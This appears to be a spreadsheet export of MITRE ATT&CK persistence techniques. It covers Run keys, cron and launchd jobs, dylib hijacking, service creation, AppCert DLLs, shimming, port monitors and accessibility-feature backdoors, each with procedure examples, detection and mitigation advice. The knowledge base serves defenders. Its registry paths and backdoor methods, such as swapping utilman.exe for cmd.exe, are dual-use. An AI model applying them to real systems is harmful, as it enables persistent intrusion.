    <t>One persistence mechanism used by [[Software/S0046|CozyCar]] is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] added Registry Run keys to establish persistence.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] achieves persistence by using various Registry Run keys.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>Winlogon is a part of some Windows versions that performs actions at logon. In Windows systems prior to Windows Vista, a Registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can establish persistence through the system screensaver by configuring it to execute the malware.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] registers itself under a Registry Run key with the name "USB Disk Security."[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] establishes persistence via a Registry Run key.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] places scripts in the startup folder for persistence. [[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.[[CiteRef::Kaspersky Sofacy]][[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Variants of [[Software/S0082|Emissary]] have added Run Registry keys to establish persistence.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key &lt;code&gt;HKCU\Software\Microsoft\Office test\Special\Perf&lt;/code&gt; to execute code.[[CiteRef::Palo Alto Office Test Sofacy]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] may create a temporary user on the system named ?Lost_{Unique Identifier}.?[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] created accounts that appeared to be tailored to each individual staging target.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] may create a temporary user on the system named ?Lost_{Unique Identifier}? with the password ?pond~!@6?{Unique Identifier}.?[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] copies itself to the Startup folder to establish persistence.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware RomeoAlfa maintains persistence by saving itself in the Start menu folder.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}&lt;/code&gt;.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can create a link to itself in the Startup folder to automatically start itself upon system restart.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] adds Registry Run keys to achieve persistence.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] malware has created a Registry Run key pointing to its malicious LNK file to establish persistence.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0145|POWERSOURCE]] achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.[[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has established persistence by using the Registry option in PowerShell Empire to add a Run key.[[CiteRef::FireEye FIN10 June 2017]][[CiteRef::Github PowerShell Empire]]</t>
  </si>
  <si>
    <t>Persistence,Execution</t>
  </si>
  <si>
    <t>Local Job Scheduling</t>
  </si>
  <si>
    <t>On Linux and Apple systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron,[[CiteRef::Die.net Linux crontab Man Page]] at,[[CiteRef::Die.net Linux at Man Page]] and launchd.[[CiteRef::AppleDocs Scheduling Timed Jobs]] Unlike [[Technique/T1053|Scheduled Task]] on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
===cron===
System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; file, &lt;code&gt;/etc/cron.d/&lt;/code&gt; directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files.[[CiteRef::AppleDocs Scheduling Timed Jobs]] This works on Mac and Linux systems.
Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for [[Persistence]],[[CiteRef::Janicab]][[CiteRef::Methods of Mac Malware Persistence]][[CiteRef::Malware Persistence on OS X]][[CiteRef::Avast Linux Trojan Cron Persistence]] to conduct [[Execution]] as part of [[Lateral Movement]], to gain root privileges, or to run a process under the context of a specific account.
===at===
The at program is another means on Linux-based systems, including Mac, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
===launchd===
Each launchd job is described by a different configuration property list (plist) file similar to [[Technique/T1160|Launch Daemon]] or [[Technique/T1159|Launch Agent]], except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values.[[CiteRef::AppleDocs Scheduling Timed Jobs]] This only works on macOS and OS X.</t>
  </si>
  <si>
    <t>Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior. ,</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.</t>
  </si>
  <si>
    <t>Administrator,User,root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1168</t>
  </si>
  <si>
    <t>Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself.[[CiteRef::Writing Bad Malware for OSX]][[CiteRef::Malware Persistence on OS X]]
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</t>
  </si>
  <si>
    <t>Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. ,</t>
  </si>
  <si>
    <t>Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can't write to these directories, then they can't intercept the search path.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1157</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] creates Registry keys to allow itself to run as various services.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]].
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence.[[CiteRef::TechNet Autoruns]] Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only  authorized administrators can create new services.
Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1050</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions:[[CiteRef::Engame Process Injection July 2017]]
*CreateProcess
*CreateProcessAsUser
*CreateProcessWithLoginW
*CreateProcessWithTokenW
*WinExec
Similar to [[Technique/T1055|Process Injection]], this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>Loaded DLLs,Process Monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.[[CiteRef::Engame Process Injection July 2017]] 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location.[[CiteRef::TechNet Autoruns]][[CiteRef::Sysinternals AppCertDlls Oct 2007]]
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for [[Command and Control]], learning details about the environment through [[Discovery]], and conducting [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1182</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>Per Apple?s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items[[CiteRef::Startup Items]]. This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn?t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism[[CiteRef::Methods of Mac Malware Persistence]]. Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. ,</t>
  </si>
  <si>
    <t>Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can?t be leveraged for privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1165</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Per Apple?s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;[[CiteRef::AppleDocs Launch Agent Daemons]]. These LaunchDaemons have property list files which point to the executables that will be launched[[CiteRef::Methods of Mac Malware Persistence]].
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories[[CiteRef::OSX Malware Detection]]. The daemon name may be disguised by using a name from a related operating system or benign software [[CiteRef::WireLurker]]. Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon?s executable and gain persistence or Privilege Escalation.</t>
  </si>
  <si>
    <t>Process Monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application. ,</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1160</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow backward compatibility of programs as Windows updates and changes its code. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.[[CiteRef::Engame Process Injection July 2017]] Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [[Technique/T1179|Hooking]] to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [[Technique/T1179|Hooking]], utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available[[CiteRef::Black Hat 2015 App Shim]]:
* Shim-Process-Scanner - checks memory of every running process for any Shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. ,</t>
  </si>
  <si>
    <t>There currently aren't a lot of ways to mitigate application shimming. Disabling the Shim Engine isn't recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC. 
Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1138</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can be added as a service to establish persistence.[[CiteRef::Lastline PlugX Analysis]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>Some [[Software/S0074|Sakula]] samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>If running as administrator,  installs itself as a new service named bmwappushservice to establish persistence.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can install a new service.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>File System Permissions Weakness</t>
  </si>
  <si>
    <t>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
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
===Services===
Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.
===Executable Installers===
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [[Technique/T1038|DLL Search Order Hijacking]]. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [[Technique/T1088|Bypass User Account Control]]. Several examples of this weakness in existing common installers have been reported to software vendors.[[CiteRef::Mozilla Firefox Installer DLL Hijack]][[CiteRef::Seclists Kanthak 7zip Installer]]</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Services</t>
  </si>
  <si>
    <t>Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to [[Discovery]] or other adversary techniques. ,</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able.[[CiteRef::Seclists Kanthak 7zip Installer]]
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;[[CiteRef::Seclists Kanthak 7zip Installer]]. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1044</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] is capable of configuring itself as a service.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] configures itself as a service.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0169|RawPOS]] installs itself as a service to maintain persistence.[[CiteRef::TrendMicro RawPOS April 2015]][[CiteRef::Mandiant FIN5 GrrCON Oct 2016]][[CiteRef::Kroll RawPOS Jan 2017]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families install themselves as new services on victims.[[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] can install as a Windows service for persistence.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has registered itself as a service to establish persistence.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>One persistence mechanism used by [[Software/S0046|CozyCar]] is to register itself as a Windows service.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Software/S0071|hcdLoader]] installs itself as a service for persistence.[[CiteRef::Dell Lateral Movement]][[CiteRef::ThreatStream Evasion Analysis]]</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[[CiteRef::AddMonitor]] This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[[CiteRef::Bloxham]] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
*Local Port
*Standard TCP/IP Port
*USB Monitor
*WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>* Monitor process API calls to AddMonitor.
* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
* Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.
* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism[[CiteRef::TechNet Autoruns]] ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by processes running under SYSTEM permissions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1013</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.[[CiteRef::FireEye Hikit Rootkit]]
Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP).[[CiteRef::DEFCON2016 Sticky Keys]] The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [[Technique/T1076|Remote Desktop Protocol]] will cause the replaced file to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]]
For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]]
Other accessibility features exist that may also be leveraged in a similar fashion:[[CiteRef::DEFCON2016 Sticky Keys]]
*On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
*Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
*Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
*Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
*App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;. ,</t>
  </si>
  <si>
    <t>To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later.[[CiteRef::TechNet RDP NLA]]
If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.[[CiteRef::TechNet RDP Gateway]]
Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1015</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] uses Windows services typically named "javamtsup" for persistence.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] malware installs itself as a service to provide persistence and SYSTEM privileges.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [[Software/S0106|cmd]] in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function.[[CiteRef::TechNet MS14-019]]
There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
===Unquoted Paths===
Service paths (stored in Windows Registry keys)[[CiteRef::Microsoft Subkey]] and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;).[[CiteRef::Baggett 2012]] An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program.
===PATH Environment Variable Misconfiguration===
